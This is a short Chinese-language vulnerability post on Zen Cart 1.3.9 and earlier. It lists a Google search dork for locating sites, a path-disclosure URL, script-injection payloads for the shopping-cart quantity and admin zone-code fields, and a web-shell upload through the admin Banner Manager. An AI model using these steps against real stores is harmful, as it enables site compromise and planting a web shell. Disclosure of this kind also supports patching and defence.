Zen Cart 上传、XSS、跨站等多个漏洞

By：追心

漏洞说明：

Zen Cart是开源、免费的商城系统，用于建立专业的网上商店。Zen Cart 支持多语言、多货币、搜索引擎优化、批量更新，是最安全的网店系统之一。Zen Cart <= v1.3.9存在XSS跨站、脚本上传、路径披露等多个漏洞。

漏洞类型：

上传漏洞、XSS、跨站漏洞

谷歌关键词：

intext:"Powered by Zen Cart"

路径披露：

https://lcx.cc/includes/languages/english.php

返回信息：

Fatal error: Call to undefined function zen_href_link() in /var/www/includes/languages/english.php on line 16

XSS跨站：

1、https://lcx.cc/index.php?main_page=shopping_cart

Qty填写："><script>alert("XSS")</script>

点击Change your Quantity(更换数量按钮)，刷新触发效果。

2、https://lcx.cc/[admin]/zones.php?page=1&action=new

Zones Code填写："><script>alert("XSS")</script>

只有在数据库中才能删除之……

上传漏洞：

https://lcx.cc/[admin]/banner_manager.php?action=new

Tools => Banner Manager => New Banner => Image: phpShell.php

上传地址：https://lcx.cc/images/phpShell.php

文章目录